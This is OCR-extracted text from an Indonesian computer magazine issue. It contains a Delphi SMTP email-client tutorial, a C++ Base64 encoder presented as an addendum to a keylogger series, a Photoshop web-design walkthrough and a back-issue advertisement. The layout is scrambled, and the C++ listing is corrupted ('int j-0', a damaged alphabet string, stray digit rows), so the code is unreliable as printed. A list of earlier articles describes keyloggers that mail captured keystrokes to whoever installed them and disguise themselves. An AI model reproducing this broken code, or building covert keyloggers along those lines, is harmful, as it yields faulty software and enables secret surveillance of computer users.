paling tua dan paling banyak digunakan. Umumnya seorang user dapat mengirimkan email dengan dua cara, yaitu melalui website yang menyediakan layanan email berbasis web atau dengan menggunakan program email client. Untuk program email client ini, yang paling banyak dan populer digunakan adalah Outlook Express buah karya Microsoft. Tanpa bermaksud untuk menandingi Microsoft, kiranya perlu juga pembaca membuat program sederhana yang dapat berfungsi untuk mengirimkan email. Meski sederhana tetapi akan terdapat rasa puas karena Anda sendiri dapat membuat aplikasi untuk mengirim email. Terlebih lagi karya Anda tersebut adalah legal, ketimbang memakai Outlook Express tetapi hasil bajakan. Pada bahasan ini Anda akan penulis bimbing untuk membuat sebuah aplikasi sederhana untuk mengirim email layaknya sebuah email client. Bahasa dan compiler yang digunakan adalah Borland Delphi 7, yang merupakan versi Delphi yang terkini. Pada versi Delphi ini terdapat komponen Indy versi 9.00.10 yang merupakan inti dalam aplikasi yang akan kita buat ini. Kita namakan saja aplikasi kita ini dengan Cyber Merpati, untuk menghargai burung merpati atas jasanya sebagai pengirim surat di masa susah dulu.

D E LP H I WO R KS H O P

E

MAIL MERUPAKAN SALAH SATU LAYANAN INTERNET YANG

Perancangan Antarmuka Cyber Merpati
Penulis menganggap bahwa Borland Delphi 7 telah terinstal pada komputer anda. Sebagai tahap pertama anda akan merancang tampilan aplikasi Cyber Merpati. Perancangan antarmuka/tampilan merupakan hal yang paling awal dilakukan dalam rangkaian pemrograman berbasis GUI (Graphical User Interface). Berdasarkan tabel berikut ini tempatkan beberapa komponen pada bidang Form1. Tabel 1. Komponen
TLabel TEdit TMemo TPanel TButton TIdMessage TIdSMTP

Tempat di Component Pallete
Pallete Standard Pallete Standard Pallete Standard Pallete Standard Pallete Standard Pallete Indy Misc Pallete Indy Clients

Jumlah
9 6 1 1 4 1 1

Selanjutnya Anda dapat mengatur tata letak komponenkomponen tersebut seperti terlihat pada Gambar 2. Anda dapat mengklik dan men-drag satu komponen dan memindahkannya ke posisi yang lain. Perhatikan saja Gambar 2.
Gambar 2. Tata letak komponenkomponen.

Menjalankan Borland Delphi 7

Pengubahan Properti Komponen
Perancangan antar muka hampir selesai. Sekarang waktunya untuk mengubah properti komponen-komponen yang digunakan dalam program agar bekerja sesuai dengan kebutuhan kita. Caranya mudah saja. Klik satu komponen pada bidang Form1 dan ubah propertinya pada Object Inspector yang ada di sebelah kiri IDE Delphi. Tabel 2 ini dapat digunakan sebagai acuan pengubahan properti komponen. Untuk komponen Edit1 sampai Edit6, kosongkan properti Text masing-masing. Pengubahan properti komponen selesai. Tampilannya sekarang terlihat seperti Gambar 3.

Gambar 1. Bidang kerja IDE Delphi 7.

Tutorial ini penulis sajikan semudah mungkin, sehingga bagi Anda yang tidak mempunyai pengalaman memprogram dengan Delphi sekalipun dapat menerapkannya secara mudah. Jangan takut dengan Delphi. Berikut dijelaskan langkahlangkah pembuatan sebagai panduan anda.
40

NeoTek Vol. IV No. 05

NeoTutor
Tabel 2 Komponen
Label1 Label2 Label3 Label4 Label5 Label6 Label7 Label8 Label9 Panel1 Button1 Button2 Button3 Button4 Memo1 Form1

Properti
Caption Caption Caption Caption Caption Caption Caption Caption Caption Caption Height Width Caption Caption Caption Caption Height Width Caption

Nilai
Host User Name Password From To Subject Body Status 3 421 Connect Send Disconnect Close 185 417 Cyber Merpati Gambar 3. Tampilan Cyber Merpati.

Hal yang sama juga pada komponen Button4. Kode yang ditambahkan adalah
Close;

Sekarang klik pada komponen IdSMTP1. Pada Object Inspector pilih tab Event. Klik ganda pada Event OnConnected. Tambahkan kode sederhana ini.
Label9.Caption := 'Hey.., already connected';

Lakukan juga pada Event OnDisconnected. Tambahkan kode ini
Label9.Caption := 'Disconnected. Sayoonaraa';

Sampai di sini segala sesuatunya selesai. Anda tinggal mengcompile-nya untuk menjalankan program Cyber Merpati. Pilih menu Run > Run, atau dengan menekan tombol F9 pada keyboard. Borland Delphi 7 akan menghasilkan file executable yang siap dijalankan di komputer lain tanpa perlu meng-install Delphi di mesin sasaran. Contoh penggunaannya akan penulis paparkan di sini. Misal Anda mempunyai email account saya@yahoo.com.sg akan mengirim email ke tujuan@dimana.co.id. Isikan pada bagian Host dengan smtp.yahoo.com.sg (host name email anda), User Name dengan saya, password dengan password anda sendiri, di kotak From isikan dengan email Anda saya@yahoo.com.sg, dst. Lanjutkan dengan menekan tombol Connect sampai status menampilkan Hey.., already connected. Ikuti dengan menekan tombol Send. Bila pengiriman berhasil, maka status akan menampilkan Message sent successfully.

Ingin Lebih dari Outlook Express
Outlook Express memang menjadi pilihan banyak pengguna komputer untuk urusan keluar masuk email. Salah satu alasannya diantaranya adalah segala kebutuhan fiturfiturnya telah cukup dan telah disediakan oleh Oulook Express. Tetapi Oulook Express ini tidak memberikan apa yang penulis inginkan karena keterbatasan untuk dapat mengubah-ubah setting. Inilah yang mendasari penulis membuat Pak Pos v2.1.2. Meski hanya digunakan untuk mengirim email, tetapi program ini mempunyai kelebihan dibanding OE, yaitu banyaknya parameter atau variable yang dapat diubah user sebelum mengirim email. Diantaranya adalah Helo Name, X-Mailer, Date, Extra Header, Priority, Reply To, Receipt Recepient, dan pengubahan header yang lain. Ini semua penulis buat dengan dasar pembahasan di atas. Anda pun dapat juga membuatnya. Dapatkan aplikasi berikut kode program Cyber Merpati yang dibahas di sini, serta aplikasi Pak Pos v2.1.2. di CD NeoTek bulan ini. Sayoonaraa.
Gambar 4. Aplikasi Pak Pos v2.1.2.

Penambahan Kode Program
Inilah bagian inti dari pembuatan aplikasi ini. Anda dapat dengan mudah mengikutinya. Pertama, klik ganda pada komponen Button1, yaitu komponen yang bertuliskan Connect. Isikan kode program ini pada bidang Code Editor yang tampil diantara blok begin dan end;.
with IdMessage1 do begin Body.Assign(Memo1.Lines); From.Text := Edit4.Text; Recipients.EMailAddresses := edit5.Text; Subject := edit6.Text; Priority := mpNormal; end; with IdSMTP1 do begin Host := Edit1.Text; Username := Edit2.Text; Password := Edit3.Text; AuthenticationType := atLogin; Connect; end;

Klik ganda lagi pada komponen Button2 yang bertuliskan Send. Isikan kode program ini pada Code Editor.
try IdSMTP1.Send(IdMessage1); finally Label9.Caption := 'Message sent successfully'; end;

Klik ganda pada komponen Button3 yang bertuliskan Disconnect. Tambahkan kode program ini diantara blok begin dan end; .
IdSMTP1.Disconnect;

Vol. IV No. 05 NeoTek

41

NeoTutor

Pengkodean Base64
Dewanata (m_strdewanata@yahoo.com) menjayikan pengodean Base64 sebagai pelengkap rangkaian artikel keylogger yang telah selesai dimuat sejak NeoTek III/8 sampai dengan NeoTek IV/4
umum dijumpai di Internet. Walaupun Base64 kadang juga disebut sebagai salah satu tipe enkripsi B (Base64 encryption), metode ini sebenarnya tidak melakukan proses enkripsi data. Base64 adalah suatu standar atau metode yang digunakan untuk merepresentasikan data dalam format tertentu. Sebagai analogi, anda dapat membandingkannya dengan format sistem bilangan binari, heksa, atau yang lainnya. Salah satu contoh pengunaan pengkodean ini adalah dalam pengiriman data SMTP (pengiriman email). Di proses tersebut, ada kalanya server SMTP mewajibkan pengirim terotentikasi sebelum melakukan pengiriman email. Untuk itu, username dan password si pengirim harus dikirimkan ke server. Data tersebut bisa dikirimkan dalam berbagai format, tergantung permintaan server. Namun pada umumnya format pengkodean yang digunakan adalah Base64.

C++ WO R KS H O P

B

ASE64 ADALAH STANDAR PENGKODEAN (ENCODING) YANG

3. Pengelompokan Mengelompokan rangkaian binari menjadi beberapa kelompok yang masing-masing berisikan enam karakter binari. Contoh kita akan menjadi: 010011 000100 100101 000001 4. Ubah ke desimal Melakukan proses konversi masing-masing kelompok binary yang dihasilkan oleh langkah sebelumnya ke angka desimal. Untuk contoh kita: 010011 → 19 000100 → 4 100101 → 37 000001 →' 1 5. Ubah ke karakter Merepresentasikan setiap desimal ke karakter yang terbaca (readable characters). Untuk itu digunakan array karakter Base64 sebagai berikut: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/ Pencarian karakter yang mewakili angka desimal kita adalah berdasarkan indeksnya. Terlihat bahwa array tersebut akan dapat mewakili setiap nilai desimal yang dihasilkan oleh langkah sebelumnya karena cakupan nilai desimal langkah empat adalah 0 (binary 000000) s/d 63 (binary 111111). Untuk contoh kita, konversi akan menghasilkan string TElB. 19 → T 4 → E 37 → l 1 → B Demikian, telah dijelaskan langkah-langkah utama dalam proses pengkodean Base64. Di bawah ini akan dijelaskan satu proses tambahan yang dapat terjadi akibat sifat pengelompokan string binary menjadi enam karakter binary, yang dilakukan di langkah tiga.

Proses Pengkodean
Langkah-langkah dasar dalam proses pengkodean: 1. Ubah ke desimal 2. Ubah ke binari 3. Pengelompokan 4. Ubah ke desimal 5. Ubah ke karakter Untuk menjelaskan proses di atas, ada baiknya kita langsung mencoba melakukan proses pengkodean langkah demi langkah, dengan menggunakan satu contoh. Untuk mudahnya, mari kita jadikan string LIA sebagai contoh string yang akan dikodekan menggunakan metode ini. 1. Ubah ke desimal Proses untuk mengonversi setiap karakter string menjadi representasi angka desimal. Jika menggunakan C++, maka konversi ini dapat dilakukan dengan memanggil fungsi int(c), dengan c adalah karakter yang akan dikonversi. Contoh: L → 76 I → 73 A → 65 2. Ubah ke binary Proses konversi setiap desimal menjadi binary. Contoh: 76 → 01001100 73 → 01001001 65 → 01000001 Pada akhir langkah dua, akan dihasilkan satu rangkaian karakter binary. Untuk contoh kita, output langkah ini adalah 010011000100100101000001
42

Padding
Ada kasus khusus dimana kita perlu menambahkan beberapa karakter dummy di akhir string kita. Jika anda perhatikan contoh sebelumnya, terutama pada langkah ketiga, akan terlihat bahwa prosedur pengelompokan tersebut hanya berlaku untuk string dengan panjang karakter habis dibagi tiga. Untuk yang tidak habis, maka proses pengelompokan akan gagal. Untuk lebih jelasnya, mari kita hilangkan karakter terakhir dari string contoh kita sebelumnya, dari LIA menjadi LI. Terlihat bahwa panjang string LI adalah 2, tidak habis dibagi 3.

NeoTek Vol. IV No. 05

NeoTutor
Setelah langkah dua dijalankan output yang dihasilkan adalah 0100110001001001. Ketika dilakukan langkah ketiga, maka output-nya adalah 010011 000100 1001. Terlihat bahwa kelompok terakhir (1001) akan kurang dari enam karakter binari. Untuk menghindari hal tersebut, maka kita perlu melakukan padding dengan langkah-langkah sebagai berikut: 1. Tambahkan binari 0 sehingga jumlah karakter menjadi habis dibagi tiga. Mari kita terapkan di contoh di atas. Pada string LI, panjang string adalah 2. Agar habis dibagi tiga, maka perlu ditambahkan 1 (satu) karakter tambahan, atau 8 (delapan) karakter binari 0 tambahan. Lihat implementasinya di bawah ini. 01001100 01001001 00000000 Keterangan: String binari pertama adalah representasi binari dari 'L' String binari kedua adalah representasi binari dari 'I' String binari ketiga (bergarisbawah) adalah tambahan yang dimaksud. 2. Lanjutkan ke langkah selanjutnya. Yaitu Langkah 4: Ubah ke desimal dan Langkah 5: Ubah ke karakter. Akan dihasilkan output akhir sebagai berikut: TEkA. Perhatikan, karakter A di akhir output adalah hasil dari proses padding. 3. Ganti karakter padding Sesuai dengan jumlah karakter tambahan, ganti karakter A yang dihasilkan akibat proses padding menjadi =. Untuk contoh kita: TEkA akan menjadi TEk=
CBase64Coder() dan ~CBase64Coder() adalah constructor dan destructor class ini. Fungsi SetPlainChar() adalah fungsi untuk memasukkan string yang akan dikodekan. Fungsi Encode() adalah fungsi untuk memulai proses pengkodean. Fungsi GetCodedChar() adalah fungsi untuk mendapatkan string hasil pengkodean.

Private member:
Variabel npad digunakan untuk menyimpan informasi banyaknya padding yang diperlukan. plain_char adalah variabel yang menyimpan string sebelum dikodekan. coded_char digunakan untuk menyimpan string yang telah dikodekan. basis_64 adalah string Base64 yang digunakan untuk mengonversi desimal ke karakter. bin_to_six_char() fungsi untuk mengelompokkan rangkaian binary menjadi per enam karakter binary. bin_to_dec() fungsi untuk mengonversi string binary menjadi desimal. char_to_bin() fungsi untuk mengonversi string karakter ASCII menjadi string binary. dec_to_bin() fungsi untuk konversi desimal ke format binary.

Berikut ini (List 2) adalah implementasi class kita. Perhatikan bahwa antisipisi kemungkinan penggunaan padding telah dimulai sejak awal pada fungsi SetPlainChar(). Penambahan padding itu sendiri dilakukan di fungsi char_to_bin().
// Base64Coder.cpp // By Dewanata m_strdewanata@yahoo.com CBase64Coder::CBase64Coder() { npad=0; basis_64 = new char[65]; strcpy(basis_64, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0 23456789+/"); 1 // 0 234567890 234567890 234567890 234567890 234567890 234567890 23 1 1 1 1 1 1 1 } CBase64Coder::~CBase64Coder() { delete [] basis_64; delete [] coded_char; delete [] plain_char; } // decimal to binary '01' char * CBase64Coder::dec_to_bin(int dec_in) { char * cbin = new char[8+1]; memset(cbin,0,8+1); int dec_step; for(int i=0; i<8; i++){ dec_step = pow(2,8-i-1); if(dec_in>=dec_step){ cbin[i] = '1'; dec_in -=dec_step; } else cbin[i] = '0'; } return cbin; } // string to binary '01' // 'Hello' will be '0100100001 10010101 10001 10001 1 1' BEFORE PADDING 101 101 101 1 char * CBase64Coder::char_to_bin(char *char_in) { int clen = strlen(char_in); char * partchar = new char[8+1];

Pemrograman
Setelah menguasai teori, mari kita mengimplementasikannya ke sebuah program. Seperti biasa, sebaiknya data dan fungsi dikapsulasi ke dalam satu class. Fungsi-fungsi yang diekspos ke publik adalah sekedar fungsi get/set. Untuk artikel ini, penulis telah membuat satu class sebagai contoh implementasi. Contoh ini dibuat sesederhana mungkin dengan lebih menekankan pada penjelasan teori. Source code lengkap disertakan dalam CD NeoTek kali ini. Perhatikan prototipe class pada List 1. Public member:
// Base64Coder.h class CBase64Coder { public: CBase64Coder () ; virtual ~CBase64Coder () ; void SetPlainChar(char * c); void Encode(); char * GetCodedChar(); private: int npad; char * plain_char; char * coded_char; char * basis_64; char * bin_to_six_char(char * bin_in); int bin_to_dec(char * bin_in); char * char_to_bin(char * char_in); char * dec_to_bin(int dec_in); };

List 1

Vol. IV No. 05 NeoTek

43

NeoTutor
char * retchar = new char[8*clen+1]; memset(retchar,0,8*clen+1); for(int i=0; i<clen; i++){ partchar = dec_to_bin(int(char_in[i])); strcat(retchar, partchar); } // add padding characters char pad_char[] = "00000000"; for(i=0; i<npad; i++){ strcat(retchar, pad_char); } delete [] partchar; return retchar; } // binary to decimal // '010010' will be 18 int CBase64Coder::bin_to_dec(char *bin_in) { int i=0; int result=0; int len=strlen(bin_in); while(bin_in[i]){ if(bin_in[i]=='1') result+=pow(2,len-i-1); i++; } return result; } char * CBase64Coder::bin_to_six_char(char *bin_in) { int i=0; int j-0 int k=0; int len=strlen(bin_in); int len2=len/6 + 1; char * result = new char[len2+1]; memset(result,0,len2+1); char * chtemp = new char[6]; while(i<len){ memset(chtemp,0,6+1); while(bin_in[i] && j<6){ chtemp[j]=bin_in[i]; j++; i++; } int m=bin_to_dec(chtemp); result[k] = basis_64[m]; j=0; k++; } // replace all paddings to '=' for(i=0; i<npad; i++) result[len2-i-2]='='; delete [] chtemp; return result; } void CBase64Coder::SetPlainChar(char *c) { plain_char = new char[strlen(c)+1]; strcpy(plain_char, c); // calculate padding int len=strlen(plain_char); npad=len%3; if(npad!=0) npad=3-npad; } // start the encoding process void CBase64Coder::Encode() { char * c = bin_to_six_char(char_to_bin(plain_char)); coded_char = new char[strlen(c)+1]; strcpy(coded_char, c); } char * CBase64Coder::GetCodedChar() { return coded_char; }

List 3 menunjukkan contoh implementasi class yang baru kita buat tadi, sedangkan Gambar 1 menunjukkan output program tersebut.
#include "stdafx.h" #include "Base64Coder.h" #include <string.h> int main(int argc, char* argv[]) { printf("BASE64 ENCODER\n\n"); char * plain_char = "LI"; printf("plain: %s\n", plain_char); CBase64Coder cbase; cbase.SetPlainChar(plain_char); cbase.Encode(); printf("coded: %s\n\n\n",cbase.GetCodedChar()); return 0; }

List 3

Gambar 1.

Rangkaian Artikel Keylogger
Artikel ini merupakan rangkaian artikel tentang pembuatan keylogger yang dimuat di nomor-nomor NeoTek sbb: C++ Workshop: Membuat Sendiri Keylogger
NeoTek III/8 NeoTek III/12 NeoTek IV/1 NeoTek IV/2 NeoTek IV/3 NeoTek IV/4 NeoTek IV/5

Keylogger v. 2.0: Modifikasi srv32.exe dan srv32.dll Hasil Intersepsi Keylogger Dikirim Otomatis ke Pemasang SMTP untuk Keylogger: Menggunakan Subscribed SMTP SMTP untuk Keylogger: Mampu Mengirim Attachment Keylogger dengan Kemampuan Kamuflase Addendum untuk Keylogger: Format Base64

44

NeoTek Vol. IV No. 05

NeoStyle

Mendayagunakan Photoshop
thc_oi@neoteker.or.id membahas suatu proyek web design menggunakan Photoshop, Image Ready, dan Dreamweaver yang disajikan secara berseri. Pada bagian pertama ini dibahas pembentukan halaman web menggunakan Photoshop.
software untuk image manipulation/retouching. Tapi jangan tertipu hanya dengan namanya, yaitu PhotoShop, sebab software pintar ini dapat digunakan untuk membuat situs web. Banyak situs web yang sekarang menggunakan photoshop, mulai dari pembuatan image sampai membuat layout-nya. Dalam hal ini tentu saja PhotoShop hanya bisa membuat tampilan halaman web saja, dan bukan untuk mengolah/ membuat script yang dinamis (kalau PS bisa untuk scripting, software lain bisa gigit jari dong) . Tapi terlepas dari kelemahannya, PhotoShop sangat ampuh untuk digunakan sebagai image editor, baik untuk desain web ataupun desain grafis. Berikut tahapan singkat dari pembuatan suatu situs web: 1. Perencanaan (layout) 2. Pembuatan image (isi dari layout) 3. Pengisian halaman 4. Upload 5. Perawatan/Maintenance Di sini saya coba mencoba memberikan panduan yang singkat, mudah, dan sederhana untuk membuat suatu situs web. Mungkin hasilnya nanti menurut anda kurang bagus saya minta maaf, tapi apa yang saya akan berikan mudah-

G R AP H I CAL WE B D E S I G N (1)

P

HOTOSOP LEBIH DIKENAL SEBAGAI PENGOLAH FOTO DAN

mudahan memberi dasar bagi anda untuk dapat membuat situs web dengan PhotoShop dan ImageReady yang jauh lebih bagus dari contoh yang saya berikan. Sebelum mempraktekkan tutorialnya, Gambar 1 menunjukkan hasil akhir tutorial ini.

Gambar 1. Hasil akhir tutorial ini.

Tahap 1A: Pembuatan Layout dan Header

untuk header content

link

1

JALANKAN PHOTOSHOP
File > New untuk ukuran, isi width 790 dan height 600 (ukuran ini dipilih agar nantinya pengunjung yang masih memakai resolusi monitor 800x600 masih bisa menikmati web anda dengan nyaman), mode RGB. Tapi nanti anda bisa mengubah ukuran sesuka hati, asal memberikan keterangan, misalnya best view @ 1024x768.

2

MEMBUAT LAYOUT
Dalam membuat layout anda dapat dibantu oleh ruler, dalam menampilkannya. Bentuk sebuah garis (guide) sebagai pembentuk layout dengan cara menariknya dari ruler ke bidang gambar. Pada tahap ini kita akan membuat header ,link, dan frame untuk content.

3

MEMBUAT HEADER
Buat teks Neoteker sebagai judul. Caranya klik ikon lalu tempatkan di bidang gambar yang diinginkan (sesuai layout). Seleksi dengan klik ikon dari pojok kiri atas sampai pojok kanan bawah guide horizontal kedua dari atas.

Vol. IV No. 05 NeoTek

45

NeoStyle

4

BACKGROUND LOGO
Di bawah text layer Neoteker yang tadi kita buat akan kita tempatkan background berupa layer tersendiri. Caranya klik icon New Layer yang pada layer palette, kemudian drag layer baru tersebut ke bawah layer teks.

5

MANIPULASI BACKGROUND
Kemudian terhadap layer itu: Filter > render > clouds Filter > noise> addnoise (17 %) Filter > blur > motion blur (00 , 80 pixel) Filter > Texture > patchwork (square size 2, relief 19) Hasilnya akan terlihat pada gambar.

6

MEMBERI WARNA BACKGROUND
Masih di layer yang sama, tekan Ctrl+U. Tick Colorize, lalu ubah nilai Hue menjadi 205, Saturation 99, dan Ligthness -7. Jika anda ingin bereksperimen dengan warna silahkan ubah nilai-nilai tersebut sesuka hati. Disini akan terjadi perubahan warna.

Hasil akhir header

7

EFEK GRADASI
Supaya background yang dibuat tidak terlihat kaku, maka perhalus dengan memberi efek gradasi. Caranya klik Add layer mask pada layer pallete. Tekan tombol D lalu X. Kemudian pilih gradient tool Pada properties gradient tool pilih opsi linear gradient, mode normal, opacity 100%, dan tick semua opsi (reverse, dither, transparency), sambil menekan Shift kemudian tarik kursor mulai dari ¾ bagian bawah layer yang telah diberi efek sampai ke guide line ke dua dari atas. Hasilnya akan terlihat di atas.

8

Tulisan Neoteker akan kita beri efek agar lebih indah. Kembali bekerja di layer teks Neoteker dengan cara memilihnya di layer pallete. Kemudian klik icon f di layer pallete. Pilih bevel dan emboss (size 2 , soften 0). Tick drop shadow untuk memberi effect bayangan. Tick gradient overlay. Atur sudut menjadi -90.

9

Kemudian klik Gradient color-nya. Atur dengan cara menggeser poin warna putih yang berada di kanan bawah ke kiri.

Hasil dari header yang telah kita buat tampak pada gambar di atas.

Tahap 1B: Menu Link

Rata dengan guide MEMBUAT MENU LINK
Pada tutorial ini, kita membuat link antara lain: About me, Gallery, Contact, Links, dan Download. Buat layer set baru (Create new layer set) dengan mengklik tombol yang ada di layer pallete. Tempatkan layer set tsb ke paling atas. Anda juga dapat mengubah nama layerset agar mudah diketahui apa isinya.

10

11

Caranya dengan double click Set 1 lalu ubah namanya. Layer set berfungsi menyimpan layer-layer dalam satu folder. Mirip dengan folder biasa yang kita kenal berisi filefile. Hanya saja sebuah layer set tidak bisa menampung layer set lagi, dan hanya bisa menampung layer-layer. Dengan kata lain tidak ada sublayer set seperti halnya subfolder. Dengan Set 1 terseleksi seperti Gambar sebelumnya buat teks (size dan font face sesuai selera anda) About me dan tempatkan di sebelah kiri. Otomatis layer baru yang kita buat akan berada di bawah layer set. Kemudian dengan Move Tool (hot key V) geser tulisan About me sejajar rata kiri dengan guide yang ada di kiri. Di sini akan terasa fungsi guide sebagai penolong, yaitu salah satunya sebagai pembantu meratakan suatu objek. Hasil sementaranya terlihat di atas.

46

NeoTek Vol. IV No. 05

NeoStyle
Klik panah ini untuk menutup layer set

12

MENU LINK YANG LAIN
Lakukan hal yang sama dalam membuat teks yang lain, yang nantinya akan dibuat sebagai link. Sampai hasilnya seperti di atas. Sekarang ada baik nya anda menutup layer set dengan meng-klik tombol panah kebawah. Tujuannya agar kita bisa mem-preview hasilnya. Jika ingin membuka kembali, tinggal klik lagi pada tanda panah bawah tadi.

13

MEMBUAT LINK TAMPAK DINAMIS
Supaya link terlihat dinamis, ada baiknya menggunakan hover link. Jadi bila mouse diletakkan di atas link itu, maka akan tampak tampilan yang lain. Untuk lebih jelasnya, lihat gambar di atas. Jadi ketika mouse di dekatkan ke link, maka link tersebut akan berubah.

14

Untuk membuat tampilan seperti itu, lakukan Duplicate layer set. Caranya: klik kanan set yang ingin di-duplicate (dalam hal ini set link) lalu beri nama over. Pastikan set over berada di bawah set link. Bila belum berada di bawah set link, drag set over ke bawah set link. Kemudian lihat isi dari set over. Pilih layer About me pada set over. Kemudian Filter > Blur > Gausian Blur; akan muncul pertanyaan, jawab saja OK. Lalu masukkan nilai 4.8 pixel.

15

Masih pada set over, layer About me. Tekan Ctrl + U untuk mengubah warnanya. Tick Colorize dan Preview agar anda bisa melihat preview nya. Lalu set Hue = 209, Saturation = 100, dan Lightness = +41. Kemudian OK.

16

Lakukan hal yang sama pada layer yang lain yang ada di set over. Sehingga untuk sementara hasilnya akan terlihat seperti gambar di atas. Kemudian buat layer set over menjadi invisible (tidak terlihat). Caranya klik lambang mata yang ada di layer over. Hal ini dimaksudkan untuk mengkondisikan link pada saat normal.

17

Yang efek itu yang kita buat tidak terlihat ketika normal (tidak di-mouse over). Sampai di sini pembuatan over link sudah siap, tapi belum selesai. Masih ada lagi bagai mana supaya menampil kan efek biru yang tadi muncul ketika di over mouse. Nanti kita akan mengolahnya di Image Ready.

Vol. IV No. 05 NeoTek

47

NeoStyle

18

Sekarang kita akan membuat frame yang di dalamnya akan berisi content dari halaman kita. Dalam frame ini juga bisa kita bubuhkan background sebagai pemanis. Berikut langkah langkahnya: • Buat Layer baru di luar layer set over dan link. Caranya pilih layer Neoteker, lalu klik New layer. • Buat seleksi sebesar layout yang kita buat dengan bantuan guide dengan menggunakan selection tool Tip

19

• Supaya frame tidak berbentuk sudut 90 derajat, haluskan dengan Select > Modify > Smooth, isi 10 pixel, atau bila ingin yang lebih bulat/halus isi dengan nilai yang lebih besar. Klik OK. • Beri stroke/garis dengan Edit > Stroke, width = 3, location center. Lagi-lagi dua warna. Untuk masalah warna saya serahkan kepada anda, tetapi saran saya gunakan hitam, gray, light gray, atau biru muda, agar serasi dengan warna yang ada. Setelah itu klik OK.

Untuk membuat backgroud, kita harus memperhatikan warna. Warna font yang akan kita pakai dengan background harus berbeda tapi serasi supaya terlihat selaras. Jika kita mau menggunkakan warna hitam untuk teks, maka warna background harus soft dan cerah. Supaya teks dapat dibaca dengan nyaman.

21

LANGKAH-LANGKAH MEMBUAT BACKGROUND
• Buka file foto yang ingin kita jadikan sebagai background dengan cara File > Open • Drag layer background pada file foto yang kita buka tadi ke jendela web yang sedang kita kerjakan. • Setelah itu akan tampak layer baru pada dokumen web project kita. • Foto ini terlihat terlalu besar, jadi kita akan mengecilkannya. Caranya cukup sederhana, hanya dengan menekan Ctrl + t maka akan terjadi adjustment sepanjang foto, lalu kecilkan sampai mendapatkan ukuran yang pas.

20 22

BACKGROUND UNTUK FRAME
Supaya lebih indah kita akan memberikan background pada frame yang kita buat. Background ini bisa berasal dari mana saja. Bisa dari foto atau dari shapes yang anda buat sendri. Kali ini kita akan menggunakan foto. Pada foto ini akan kita lakukan sedikit editing. Di atas adalah contoh foto yang kita gunakan.

Tip Tekan Shift ketika melakukan resize pada gambar, agar gambar tetap proporsional tinggi dan lebarnya. Hindari membesarkan foto atau gambar (berbasis pixel) karena akan membuat foto/gambar itu menjadi pixelate. • Bila anda ingin membuang bagian yang tidak diinginkan dari foto tersebut, sebaiknya gunakan mask dan hindari menggunakan erase tool. Dengan mask kita bisa me-restore kembali apa yang telah kita hilangkan.
Cara menggunakan mask: • Pilih layer foto, lalu klik tombol Add layer mask pada layer palete. • Tekan d untuk men-default-kan warna (hitam sebagai foreground dan putih sebagai background). • Gunakan brush tool, klik kanan untuk menampilkan Properties-nya dan gunakan brush soft round, yang ukurannya sesuaikan dengan keadaan foto. Untuk ini saya gunakan 40 px. • Kini lukis daerah yang ingin dihilangkan dengan brush tool tsb

FINISHING
• Level pencahayaan foto ini dirasa kurang pas, untuk mengcustomize level-nya kita lakukan adjustment pada foto ini agar terlihat lebih baik. Caranya Image > Adjustment > Level. Setelah itu atur ketiga point yang ada di slide.
Keterangan: • Point yang paling kiri adalah untuk menentukan black point • Point yang paling kanan adalah untuk mementukan white point

Sulit menjelaskan secara detail. Cara terbaik adalah dengan mencobanya sendiri. Lakukan coba-coba menggeser bagian kiri, tengah, atau kanan dan perhatikan perbedaannya. Terkadang hanya perlu melakukan perubahan sedikit saja pada point yang ditengah. Cara coba-coba lazim digunakan, karena tidak ada acuan pasti. • Sekarang kita ubah warna foto ini menjadi biru (menyesuaikan dengan warna yang lain). Caranya Image > Adjustment > Hue/Saturation (Ctrl+U), tick opsi Colorise kemudian geser slide Hue untuk mengatur warnanya sehingga menjadi biru (biasanya di daerah tengah), atur Saturation untuk mengatur muda/tuanya warna, kemudian Lightness untuk mengatur intensitas cahaya. Bila semuanya sudah pas sesuai dengan yang diinginkan, klik OK. Ingat untuk background yang nantinya akan diisi dengan teks berwarna gelap, backgroundnya harus berwarna soft dan terang serta pudar.

• Sekarang ubah opacity dari layer foto sampai terlihat memudar. Hal ini dimaksudkan suapa nantinya kombinasi warna text dan background menjadi serasi. Di bagian kiri bawah masih terlihat kosong, anda bisa membiarkannya atau lebih baik mengisinya dengan sesuatu, bisa shapes/bentuk,logo, atau foto anda. Caranya sama seperti pada waktu kita memasukkan foto tadi. Apabila ukurannya terlalu besar maka bisa di-resize dengan hot key Crtl+t.

Selesai sudah tugas PhotoShop sampai di sini dan jangan lupa untuk menyimpan hasil karya anda dalam format .PSD. Pada suatu saat apabila perlu dilakukan editing dapatdengan mudah dikerjakan.

48

NeoTek Vol. IV No. 05

Ketinggalan Membaca NeoTek?
hacking, security, programming, maupun sekedar memanfaatkan software pada dasarnya tidak akan pernah basi dan layak dikoleksi. Tetapi bagaimana apabila anda barubaru ini saja tahu adanya NeoTek, atau edisi lama NeoTek ataupun CDnya hilang, dipinjam tidak dikembalikan, ataupun rusak? Dapatkan di Pameran NeoTek selalu hadir di pameran-pameran M komputer di Jakarta. (Mega Bazaar Computer, Festival Komputer Indonesia, dan IndoComtech). Dapatkan Langsung Cara pasti adalah mendapatkan langsung dari NeoTek dengan menghubungi:
PT NeoTek Maju Mandiri Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III/9 Jakarta 11480 Telp. 021-5481457, Fax. 021-5329041 M email: redaksi@neotek.co.id (Marni)

N

EOTEK DENGAN ARTIKEL-ARTIKEL

Aswan Bakri BCA KCP Rawamangun No. rek. 0940544131

NeoTek di stockist dijual dengan cover price sebagai berikut:
Vol. I (tanpa CD) No. 1 s/d 9, Rp6500,Vol. I (tanpa CD) No. 10 s/d 12, Rp9500,Vol. II (+CD) No. 1 s/d 12, Rp19.500,Vol. III (+CD) No. 1 s/d 12, Rp19.500,Vol. IV (+CD) No. 1 s/d 3, Rp19.500,Vol. IV (+CD) No. 4 dst., Rp20.000,- (P. Jawa) dan Rp22.000,- (Luar P. Jawa)

Dapatkan dari Stockist Untuk yang berada di luar Jakarta, menghubungi NeoTek di Jakarta akan membawa kerepotan selain juga harus menanggung ongkos kirim. Untuk itu NeoTek tersedia di beberapa kota sbb:
